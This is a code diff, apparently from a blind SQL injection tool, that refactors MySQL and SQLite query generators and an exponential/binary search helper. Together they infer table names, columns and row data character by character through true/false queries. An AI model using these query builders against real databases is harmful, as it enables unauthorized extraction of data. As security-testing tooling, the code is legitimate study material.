+    def string(self, ctx, values): raise NotImplementedError()
+
+
+class DBMS(metaclass=ABCMeta):
+    '''Database Management System (DBMS) interface.
+
+    Attributes:
+        DATA_TYPES (list): all data types available
+        MetaQueries (MetaQueries): queries of metadata extraction
+        TablesQueries (UniformQueries): queries for table names extraction
+        ColumnsQueries (UniformQueries): queries for column names extraction
+        RowsQueries (UniformQueries): queries for rows extraction
+    '''
+    _RE_ESCAPE = re.compile(r'[a-zA-Z0-9_#@]+')
+    DATA_TYPES = []
+    MetaQueries = None
+    TablesQueries = None
+    ColumnsQueries = None
+    RowsQueries = None
+
+    @staticmethod
+    def escape(s):
+        if DBMS._RE_ESCAPE.fullmatch(s):
+            return s
+        assert ']' not in s, f'Cannot escape "{s}"'
+        return f'[{s}]'
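
The two escape() implementations differ only in quoting style; assumed behavior under the anchored regex above (invented example identifiers):

    DBMS.escape('users')        # 'users' -- fully matches [a-zA-Z0-9_#@]+, passes through
    DBMS.escape('user data')    # '[user data]'
    MySQL.escape('user data')   # '`user data`' (the MySQL override below)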

@@ -1,9 +1,298 @@
-from hakuin.utils import EOS
-from .DBMS import DBMS
+from hakuin.utils import EOS, ASCII_MAX
+from .DBMS import DBMS, MetaQueries, UniformQueries
+
+
+class MySQLMetaQueries(MetaQueries):
+    def column_data_type(self, ctx, values):
+        values = [f"'{v}'" for v in values]
+        query = f'''
+            SELECT lower(DATA_TYPE) in ({','.join(values)})
+            FROM information_schema.columns
+            WHERE TABLE_SCHEMA=database() AND
+                TABLE_NAME=x'{self.hex(ctx.table)}' AND
+                COLUMN_NAME=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+    def column_is_nullable(self, ctx):
+        query = f'''
+            SELECT IS_NULLABLE='YES'
+            FROM information_schema.columns
+            WHERE TABLE_SCHEMA=database() AND
+                TABLE_NAME=x'{self.hex(ctx.table)}' AND
+                COLUMN_NAME=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+    def column_is_pk(self, ctx):
+        query = f'''
+            SELECT COLUMN_KEY='PRI'
+            FROM information_schema.columns
+            WHERE TABLE_SCHEMA=database() AND
+                TABLE_NAME=x'{self.hex(ctx.table)}' AND
+                COLUMN_NAME=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+
+class MySQLTablesQueries(UniformQueries):
+    def rows_count(self, ctx, n):
+        query = f'''
+            SELECT count(*) < {n}
+            FROM information_schema.TABLES
+            WHERE TABLE_SCHEMA=database()
+        '''
+        return self.normalize(query)
+
+    def rows_are_ascii(self, ctx):
+        # min() simulates the logical ALL operator here
+        query = f'''
+            SELECT min(TABLE_NAME = CONVERT(TABLE_NAME using ASCII))
+            FROM information_schema.TABLES
+            WHERE TABLE_SCHEMA=database()
+        '''
+        return self.normalize(query)
+
+    def row_is_ascii(self, ctx):
+        query = f'''
+            SELECT TABLE_NAME = CONVERT(TABLE_NAME using ASCII)
+            FROM information_schema.TABLES
+            WHERE TABLE_SCHEMA=database()
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char_is_ascii(self, ctx):
+        query = f'''
+            SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
+            FROM information_schema.TABLES
+            WHERE TABLE_SCHEMA=database()
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char(self, ctx, values):
+        has_eos = EOS in values
+        values = [v for v in values if v != EOS]
+        values = ''.join(values).encode('utf-8').hex()
+
+        if has_eos:
+            query = f'''
+                SELECT locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
+                FROM information_schema.TABLES
+                WHERE TABLE_SCHEMA=database()
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        else:
+            query = f'''
+                SELECT char_length(TABLE_NAME) != {len(ctx.s)} AND
+                    locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
+                FROM information_schema.TABLES
+                WHERE TABLE_SCHEMA=database()
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        return self.normalize(query)
+
+    def char_unicode(self, ctx, n):
+        query = f'''
+            SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
+            FROM information_schema.TABLES
+            WHERE TABLE_SCHEMA=database()
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def string(self, ctx):
+        raise NotImplementedError('TODO?')
+
+
+class MySQLColumnsQueries(UniformQueries):
+    def rows_count(self, ctx, n):
+        query = f'''
+            SELECT count(*) < {n}
+            FROM information_schema.COLUMNS
+            WHERE TABLE_SCHEMA=database() AND
+                TABLE_NAME=x'{self.hex(ctx.table)}'
+        '''
+        return self.normalize(query)
+
+    def rows_are_ascii(self, ctx):
+        query = f'''
+            SELECT min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))
+            FROM information_schema.COLUMNS
+            WHERE TABLE_SCHEMA=database() AND
+                TABLE_NAME=x'{self.hex(ctx.table)}'
+        '''
+        return self.normalize(query)
+
+    def row_is_ascii(self, ctx):
+        query = f'''
+            SELECT COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII)
+            FROM information_schema.COLUMNS
+            WHERE TABLE_SCHEMA=database() AND
+                TABLE_NAME=x'{self.hex(ctx.table)}'
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char_is_ascii(self, ctx):
+        query = f'''
+            SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
+            FROM information_schema.COLUMNS
+            WHERE TABLE_SCHEMA=database() AND
+                TABLE_NAME=x'{self.hex(ctx.table)}'
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char(self, ctx, values):
+        has_eos = EOS in values
+        values = [v for v in values if v != EOS]
+        values = ''.join(values).encode('utf-8').hex()
+
+        if has_eos:
+            query = f'''
+                SELECT locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
+                FROM information_schema.COLUMNS
+                WHERE TABLE_SCHEMA=database() AND
+                    TABLE_NAME=x'{self.hex(ctx.table)}'
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        else:
+            query = f'''
+                SELECT char_length(COLUMN_NAME) != {len(ctx.s)} AND
+                    locate(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
+                FROM information_schema.COLUMNS
+                WHERE TABLE_SCHEMA=database() AND
+                    TABLE_NAME=x'{self.hex(ctx.table)}'
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        return self.normalize(query)
+
+    def char_unicode(self, ctx, n):
+        query = f'''
+            SELECT ord(convert(substr(COLUMN_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {n}
+            FROM information_schema.COLUMNS
+            WHERE TABLE_SCHEMA=database() AND
+                TABLE_NAME=x'{self.hex(ctx.table)}'
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def string(self, ctx):
+        raise NotImplementedError('TODO?')
+
+
+class MySQLRowsQueries(UniformQueries):
+    def rows_count(self, ctx, n):
+        query = f'''
+            SELECT count(*) < {n}
+            FROM {MySQL.escape(ctx.table)}
+        '''
+        return self.normalize(query)
+
+    def rows_are_ascii(self, ctx):
+        query = f'''
+            SELECT min({MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII))
+            FROM {MySQL.escape(ctx.table)}
+        '''
+        return self.normalize(query)
+
+    def row_is_ascii(self, ctx):
+        query = f'''
+            SELECT {MySQL.escape(ctx.column)} = CONVERT({MySQL.escape(ctx.column)} using ASCII)
+            FROM {MySQL.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char_is_ascii(self, ctx):
+        query = f'''
+            SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
+            FROM {MySQL.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char(self, ctx, values):
+        has_eos = EOS in values
+        values = [v for v in values if v != EOS]
+        values = ''.join(values).encode('utf-8').hex()
+
+        if has_eos:
+            query = f'''
+                SELECT locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}')
+                FROM {MySQL.escape(ctx.table)}
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        else:
+            query = f'''
+                SELECT char_length({MySQL.escape(ctx.column)}) != {len(ctx.s)} AND
+                    locate(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1), x'{values}')
+                FROM {MySQL.escape(ctx.table)}
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        return self.normalize(query)
+
+    def char_unicode(self, ctx, n):
+        query = f'''
+            SELECT ord(convert(substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1) using utf32)) < {n}
+            FROM {MySQL.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def string(self, ctx, values):
+        values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
+        query = f'''
+            SELECT {MySQL.escape(ctx.column)} in ({','.join(values)})
+            FROM {MySQL.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
 class MySQL(DBMS):
     DATA_TYPES = [
@@ -14,151 +303,15 @@ class MySQL(DBMS):
         'multilinestring', 'multipolygon', 'geometrycollection ', 'json'
     ]
 
+    MetaQueries = MySQLMetaQueries()
+    TablesQueries = MySQLTablesQueries()
+    ColumnsQueries = MySQLColumnsQueries()
+    RowsQueries = MySQLRowsQueries()
 
-    def count_rows(self, ctx, n):
-        query = f'''
-            SELECT COUNT(*) < {n}
-            FROM {ctx.table}
-        '''
-        return self.normalize(query)
+    @staticmethod
+    def escape(s):
+        if DBMS._RE_ESCAPE.fullmatch(s):
+            return s
+        assert '`' not in s, f'Cannot escape "{s}"'
+        return f'`{s}`'
 
-    def count_tables(self, ctx, n):
-        query = f'''
-            SELECT COUNT(*) < {n}
-            FROM information_schema.TABLES
-            WHERE TABLE_SCHEMA=DATABASE()
-        '''
-        return self.normalize(query)
-
-    def count_columns(self, ctx, n):
-        query = f'''
-            SELECT COUNT(*) < {n}
-            FROM information_schema.COLUMNS
-            WHERE TABLE_SCHEMA=DATABASE() AND
-                TABLE_NAME='{ctx.table}'
-        '''
-        return self.normalize(query)
-
-    def meta_type(self, ctx, values):
-        values = [f"'{v}'" for v in values]
-        query = f'''
-            SELECT LOWER(DATA_TYPE) in ({','.join(values)})
-            FROM information_schema.columns
-            WHERE TABLE_SCHEMA=DATABASE() AND
-                TABLE_NAME='{ctx.table}' AND
-                COLUMN_NAME='{ctx.column}'
-        '''
-        return self.normalize(query)
-
-    def meta_is_nullable(self, ctx):
-        query = f'''
-            SELECT IS_NULLABLE='YES'
-            FROM information_schema.columns
-            WHERE TABLE_SCHEMA=DATABASE() AND
-                TABLE_NAME='{ctx.table}' AND
-                COLUMN_NAME='{ctx.column}'
-        '''
-        return self.normalize(query)
-
-    def meta_is_pk(self, ctx):
-        query = f'''
-            SELECT COLUMN_KEY='PRI'
-            FROM information_schema.columns
-            WHERE TABLE_SCHEMA=DATABASE() AND
-                TABLE_NAME='{ctx.table}' AND
-                COLUMN_NAME='{ctx.column}'
-        '''
-        return self.normalize(query)
-
-    def char_rows(self, ctx, values):
-        has_eos = EOS in values
-        values = [v for v in values if v != EOS]
-        values = ''.join(values).encode('ascii').hex()
-        if has_eos:
-            # if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
-            query = f'''
-                SELECT LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
-                FROM {ctx.table}
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        else:
-            query = f'''
-                SELECT SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
-                    LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
-                FROM {ctx.table}
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        return self.normalize(query)
-
-    def char_tables(self, ctx, values):
-        has_eos = EOS in values
-        values = [v for v in values if v != EOS]
-        values = ''.join(values).encode('ascii').hex()
-        if has_eos:
-            query = f'''
-                SELECT LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
-                FROM information_schema.TABLES
-                WHERE TABLE_SCHEMA=DATABASE()
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        else:
-            query = f'''
-                SELECT SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1) != '' AND
-                    LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
-                FROM information_schema.TABLES
-                WHERE TABLE_SCHEMA=DATABASE()
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        return self.normalize(query)
-
-    def char_columns(self, ctx, values):
-        has_eos = EOS in values
-        values = [v for v in values if v != EOS]
-        values = ''.join(values).encode('ascii').hex()
-        if has_eos:
-            query = f'''
-                SELECT LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
-                FROM information_schema.COLUMNS
-                WHERE TABLE_SCHEMA=DATABASE() AND
-                    TABLE_NAME='{ctx.table}'
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        else:
-            query = f'''
-                SELECT SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1) != '' AND
-                    LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
-                FROM information_schema.COLUMNS
-                WHERE TABLE_SCHEMA=DATABASE() AND
-                    TABLE_NAME='{ctx.table}'
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        return self.normalize(query)
-
-    def string_rows(self, ctx, values):
-        values = [f"x'{v.encode('ascii').hex()}'" for v in values]
-        query = f'''
-            SELECT {ctx.column} in ({','.join(values)})
-            FROM {ctx.table}
-            LIMIT 1
-            OFFSET {ctx.row}
-        '''
-        return self.normalize(query)
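
To make the generated query shape concrete, a hypothetical rendering of MySQLRowsQueries.char (table, column, and values are invented examples):

    # ctx: table='users', column='name', s='Ja', row=3; values = ['n', 'm', EOS].
    # EOS is in values, so the locate() branch applies; ''.join(['n', 'm'])
    # .encode('utf-8').hex() == '6e6d' and len(ctx.s) + 1 == 3, giving:
    #     SELECT locate(substr(name, 3, 1), x'6e6d') FROM users LIMIT 1 OFFSET 3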

@@ -1,145 +1,290 @@
 from hakuin.utils import EOS
-from .DBMS import DBMS
+from .DBMS import DBMS, MetaQueries, UniformQueries
 
 
-class SQLite(DBMS):
-    DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
-
-    def count_rows(self, ctx, n):
-        query = f'''
-            SELECT COUNT(*) < {n}
-            FROM {ctx.table}
-        '''
-        return self.normalize(query)
-
-    def count_tables(self, ctx, n):
-        query = f'''
-            SELECT COUNT(*) < {n}
-            FROM sqlite_master
-            WHERE type='table'
-        '''
-        return self.normalize(query)
-
-    def count_columns(self, ctx, n):
-        query = f'''
-            SELECT COUNT(*) < {n}
-            FROM pragma_table_info('{ctx.table}')
-        '''
-        return self.normalize(query)
-
-    def meta_type(self, ctx, values):
-        values = [f"'{v}'" for v in values]
-        query = f'''
-            SELECT type in ({','.join(values)})
-            FROM pragma_table_info('{ctx.table}')
-            WHERE name='{ctx.column}'
-        '''
-        return self.normalize(query)
-
-    def meta_is_nullable(self, ctx):
-        query = f'''
-            SELECT [notnull] == 0
-            FROM pragma_table_info('{ctx.table}')
-            WHERE name='{ctx.column}'
-        '''
-        return self.normalize(query)
-
-    def meta_is_pk(self, ctx):
-        query = f'''
-            SELECT pk
-            FROM pragma_table_info('{ctx.table}')
-            WHERE name='{ctx.column}'
-        '''
-        return self.normalize(query)
-
-    def char_rows(self, ctx, values):
-        has_eos = EOS in values
-        values = [v for v in values if v != EOS]
-        values = ''.join(values).encode('ascii').hex()
-        if has_eos:
-            # if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
-            query = f'''
-                SELECT instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
-                FROM {ctx.table}
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        else:
-            query = f'''
-                SELECT substr({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
-                    instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
-                FROM {ctx.table}
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        return self.normalize(query)
-
-    def char_tables(self, ctx, values):
-        has_eos = EOS in values
-        values = [v for v in values if v != EOS]
-        values = ''.join(values).encode('ascii').hex()
-        if has_eos:
-            query = f'''
-                SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
-                FROM sqlite_master
-                WHERE type='table'
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        else:
-            query = f'''
-                SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
-                    instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
-                FROM sqlite_master
-                WHERE type='table'
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        return self.normalize(query)
-
-    def char_columns(self, ctx, values):
-        has_eos = EOS in values
-        values = [v for v in values if v != EOS]
-        values = ''.join(values).encode('ascii').hex()
-        if has_eos:
-            query = f'''
-                SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
-                FROM pragma_table_info('{ctx.table}')
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        else:
-            query = f'''
-                SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
-                    instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
-                FROM pragma_table_info('{ctx.table}')
-                LIMIT 1
-                OFFSET {ctx.row}
-            '''
-        return self.normalize(query)
-
-    def string_rows(self, ctx, values):
-        values = [f"x'{v.encode('ascii').hex()}'" for v in values]
-        query = f'''
-            SELECT cast({ctx.column} as BLOB) in ({','.join(values)})
-            FROM {ctx.table}
-            LIMIT 1
-            OFFSET {ctx.row}
-        '''
-        return self.normalize(query)
+class SQLiteMetaQueries(MetaQueries):
+    def column_data_type(self, ctx, values):
+        values = [f"'{v}'" for v in values]
+        query = f'''
+            SELECT type in ({','.join(values)})
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+            WHERE name=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+    def column_is_nullable(self, ctx):
+        query = f'''
+            SELECT [notnull] == 0
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+            WHERE name=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+    def column_is_pk(self, ctx):
+        query = f'''
+            SELECT pk
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+            WHERE name=x'{self.hex(ctx.column)}'
+        '''
+        return self.normalize(query)
+
+
+class SQLiteTablesQueries(UniformQueries):
+    def rows_count(self, ctx, n):
+        query = f'''
+            SELECT count(*) < {n}
+            FROM sqlite_master
+            WHERE type='table'
+        '''
+        return self.normalize(query)
+
+    def rows_are_ascii(self, ctx):
+        # SQLite does not have native "isascii" function. As a workaround we try to look for
+        # non-ascii characters with "*[^\x01-\x7f]*" glob patterns. The pattern does not need to
+        # include the null terminator (0x00) because SQLite will never pass it to the GLOB expression.
+        # Also, the pattern is hex-encoded because SQLite does not support special characters in
+        # string literals. Lastly, sum() simulates the logical ANY operator here. Note that an empty
+        # string resolves to True, which is correct.
+        query = f'''
+            SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
+            FROM sqlite_master
+            WHERE type='table'
+        '''
+        return self.normalize(query)
+
+    def row_is_ascii(self, ctx):
+        query = f'''
+            SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
+            FROM sqlite_master
+            WHERE type='table'
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char_is_ascii(self, ctx):
+        query = f'''
+            SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
+            FROM sqlite_master
+            WHERE type='table'
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char(self, ctx, values):
+        has_eos = EOS in values
+        values = [v for v in values if v != EOS]
+        values = ''.join(values).encode('utf-8').hex()
+
+        if has_eos:
+            query = f'''
+                SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
+                FROM sqlite_master
+                WHERE type='table'
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        else:
+            query = f'''
+                SELECT length(name) != {len(ctx.s)} AND
+                    instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
+                FROM sqlite_master
+                WHERE type='table'
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        return self.normalize(query)
+
+    def char_unicode(self, ctx, n):
+        query = f'''
+            SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
+            FROM sqlite_master
+            WHERE type='table'
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def string(self, ctx):
+        raise NotImplementedError('TODO?')
+
+
+class SQLiteColumnsQueries(UniformQueries):
+    def rows_count(self, ctx, n):
+        query = f'''
+            SELECT count(*) < {n}
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+        '''
+        return self.normalize(query)
+
+    def rows_are_ascii(self, ctx):
+        query = f'''
+            SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+        '''
+        return self.normalize(query)
+
+    def row_is_ascii(self, ctx):
+        query = f'''
+            SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char_is_ascii(self, ctx):
+        query = f'''
+            SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char(self, ctx, values):
+        has_eos = EOS in values
+        values = [v for v in values if v != EOS]
+        values = ''.join(values).encode('utf-8').hex()
+
+        if has_eos:
+            query = f'''
+                SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
+                FROM pragma_table_info(x'{self.hex(ctx.table)}')
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        else:
+            query = f'''
+                SELECT length(name) != {len(ctx.s)} AND
+                    instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
+                FROM pragma_table_info(x'{self.hex(ctx.table)}')
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        return self.normalize(query)
+
+    def char_unicode(self, ctx, n):
+        query = f'''
+            SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
+            FROM pragma_table_info(x'{self.hex(ctx.table)}')
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def string(self, ctx):
+        raise NotImplementedError('TODO?')
+
+
+class SQLiteRowsQueries(UniformQueries):
+    def rows_count(self, ctx, n):
+        query = f'''
+            SELECT count(*) < {n}
+            FROM {SQLite.escape(ctx.table)}
+        '''
+        return self.normalize(query)
+
+    def rows_are_ascii(self, ctx):
+        query = f'''
+            SELECT sum({SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
+            FROM {SQLite.escape(ctx.table)}
+        '''
+        return self.normalize(query)
+
+    def row_is_ascii(self, ctx):
+        query = f'''
+            SELECT {SQLite.escape(ctx.column)} not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
+            FROM {SQLite.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char_is_ascii(self, ctx):
+        query = f'''
+            SELECT substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
+            FROM {SQLite.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def char(self, ctx, values):
+        has_eos = EOS in values
+        values = [v for v in values if v != EOS]
+        values = ''.join(values).encode('utf-8').hex()
+
+        if has_eos:
+            query = f'''
+                SELECT instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
+                FROM {SQLite.escape(ctx.table)}
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        else:
+            query = f'''
+                SELECT length({SQLite.escape(ctx.column)}) != {len(ctx.s)} AND
+                    instr(x'{values}', substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1))
+                FROM {SQLite.escape(ctx.table)}
+                LIMIT 1
+                OFFSET {ctx.row}
+            '''
+        return self.normalize(query)
+
+    def char_unicode(self, ctx, n):
+        query = f'''
+            SELECT unicode(substr({SQLite.escape(ctx.column)}, {len(ctx.s) + 1}, 1)) < {n}
+            FROM {SQLite.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+    def string(self, ctx, values):
+        values = [f"x'{v.encode('utf-8').hex()}'" for v in values]
+        query = f'''
+            SELECT cast({SQLite.escape(ctx.column)} as BLOB) in ({','.join(values)})
+            FROM {SQLite.escape(ctx.table)}
+            LIMIT 1
+            OFFSET {ctx.row}
+        '''
+        return self.normalize(query)
+
+
+class SQLite(DBMS):
+    DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
+
+    MetaQueries = SQLiteMetaQueries()
+    TablesQueries = SQLiteTablesQueries()
+    ColumnsQueries = SQLiteColumnsQueries()
+    RowsQueries = SQLiteRowsQueries()
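
The hex blob repeated through the SQLite queries is the glob pattern the rows_are_ascii comment describes; a standalone decode:

    print(repr(bytes.fromhex('2a5b5e012d7f5d2a').decode()))   # '*[^\x01-\x7f]*'
    # name not glob '*[^\x01-\x7f]*' is true exactly when name contains no
    # character outside the \x01-\x7f ASCII range.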

@ -42,19 +42,23 @@ class SearchAlgorithm(metaclass=ABCMeta):
class IntExponentialSearch(SearchAlgorithm): class IntExponentialBinarySearch(SearchAlgorithm):
'''Exponential search for integers.''' '''Exponential and binary search for integers.'''
def __init__(self, requester, query_cb, upper=16, correct=None): def __init__(self, requester, query_cb, lower=0, upper=16, find_range=True, correct=None):
'''Constructor. '''Constructor.
Params: Params:
requester (Requester): Requester instance requester (Requester): Requester instance
query_cb (function): query construction function query_cb (function): query construction function
upper (int): initial upper bound of search range lower (int): lower bound of search range
upper (int): upper bound of search range
find_range (bool): exponentially expands range until the correct value is within
correct (int|None): correct value. If provided, the search is emulated correct (int|None): correct value. If provided, the search is emulated
''' '''
super().__init__(requester, query_cb) super().__init__(requester, query_cb)
self.lower = lower
self.upper = upper self.upper = upper
self.find_range = find_range
self.correct = correct self.correct = correct
self.n_queries = 0 self.n_queries = 0
@ -63,22 +67,26 @@ class IntExponentialSearch(SearchAlgorithm):
'''Runs the search algorithm. '''Runs the search algorithm.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
Returns: Returns:
int: inferred number int: inferred number
''' '''
self.n_queries = 0 self.n_queries = 0
lower, upper = self._get_range(ctx, lower=0, upper=self.upper) if self.find_range:
lower, upper = self._find_range(ctx, lower=self.lower, upper=self.upper)
else:
lower, upper = self.lower, self.upper
return self._search(ctx, lower, upper) return self._search(ctx, lower, upper)
def _get_range(self, ctx, lower, upper): def _find_range(self, ctx, lower, upper):
'''Exponentially expands the search range until the correct value is within. '''Exponentially expands the search range until the correct value is within.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
lower (int): lower bound lower (int): lower bound
upper (int): upper bound upper (int): upper bound
@ -88,14 +96,14 @@ class IntExponentialSearch(SearchAlgorithm):
if self._query(ctx, upper): if self._query(ctx, upper):
return lower, upper return lower, upper
return self._get_range(ctx, upper, upper * 2) return self._find_range(ctx, upper, upper * 2)
def _search(self, ctx, lower, upper): def _search(self, ctx, lower, upper):
'''Numeric binary search. '''Numeric binary search.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
lower (int): lower bound lower (int): lower bound
upper (int): upper bound upper (int): upper bound
@ -108,8 +116,8 @@ class IntExponentialSearch(SearchAlgorithm):
middle = (lower + upper) // 2 middle = (lower + upper) // 2
if self._query(ctx, middle): if self._query(ctx, middle):
return self._search(ctx, lower, middle) return self._search(ctx, lower, middle)
else:
return self._search(ctx, middle, upper) return self._search(ctx, middle, upper)
def _query(self, ctx, n): def _query(self, ctx, n):
@ -118,8 +126,8 @@ class IntExponentialSearch(SearchAlgorithm):
if self.correct is None: if self.correct is None:
query_string = self.query_cb(ctx, n) query_string = self.query_cb(ctx, n)
return self.requester.request(ctx, query_string) return self.requester.request(ctx, query_string)
else:
return self.correct < n return self.correct < n
@ -144,13 +152,12 @@ class BinarySearch(SearchAlgorithm):
'''Runs the search algorithm. '''Runs the search algorithm.
Params: Params:
ctx (Context): inference context ctx (Context): extraction context
Returns: Returns:
value|None: inferred value or None on fail value|None: inferred value or None on fail
''' '''
self.n_queries = 0 self.n_queries = 0
return self._search(ctx, self.values) return self._search(ctx, self.values)
@ -165,8 +172,8 @@ class BinarySearch(SearchAlgorithm):
